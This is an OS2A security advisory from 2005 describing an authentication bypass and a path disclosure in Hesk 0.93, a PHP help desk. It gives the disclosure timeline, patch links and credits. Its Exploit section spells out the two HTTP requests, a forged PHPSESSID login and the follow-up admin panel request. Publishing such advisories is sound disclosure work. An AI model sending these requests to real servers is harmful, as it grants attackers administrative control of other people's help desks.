OS2A_1003.txt

`OS2A  
  
Hesk Session ID Validation Vulnerability  
  
  
OS2A ID: OS2A_1003 Status  
9/13/2005 Issue Discovered  
9/14/2005 Reported to the vendor  
9/18/2005 Patch Released  
9/20/2005 Advisory Released  
  
  
Class: Authentication Bypass Severity: CRITICAL  
  
  
Overview:  
Hesk is a PHP based help desk software that runs with a MySQL database.   
It allows to setup a ticket based support system (helpdesk) for websites.  
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path   
disclosure vulnerabilities caused due to improper validation of the HTTP   
header. This vulnerability can be exploited to bypass authentication   
mechanism, and also made to reveal system specific information.   
  
  
Description:  
Multiple vulnerabilities exist in Hesk ticket based support system.  
  
1. Authentication Bypass  
The 'PHPSESSID', Session ID parameter in the HTTP header is not properly   
validated. A malicious user can log in to the Administrator account by   
sending a random value to 'PHPSESSID' parameter and posting it to   
admin.php. This Session ID can then be utilized to access administrative   
control panel.   
  
This is similar to a previously reported vulnerability where invalid   
User ID and Password were submitted. In this case, a randomly chosen   
Session ID is sent along with the login request.   
  
2. Path Disclosure.  
Path information can be made to disclose in error pages by passing invalid   
metacharacters such as "'" or "<" to 'PHPSESSID' field of the HTTP header.  
  
  
Impact:  
Successful exploitation can result in a compromise of the application,   
disclosure of system specific information.  
  
Affected Systems:  
Hesk 0.93 and prior.  
Linux (Any), Unix (Any), Windows (Any)  
  
Exploit:  
1. HTTP POST request with randomly chosen Session ID:  
POST admin.php +  
("Host: host_ip  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)   
Accept: text/xml,application/xml,application/xhtml+xml,text/html  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://host_ip/hesk/admin.php  
Cookie: PHPSESSID=12345 <!-- Random Session ID --!>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 26  
user=1&pass=sdfd&a=do_login");  
  
2. GET request to administrative control panel:  
GET admin_main.php +  
("Host: host_ip  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)   
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Cookie: PHPSESSID=12345") <!-- Session ID --!>  
  
Solutions:  
Patch:   
http://www.phpjunkyard.com/extras/hesk_0931_patch.zip  
OR Hesk 0.93.1 from  
http://www.phpjunkyard.com/free-helpdesk-software.php  
  
Credits:  
Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A have discovered   
the vulnerability  
`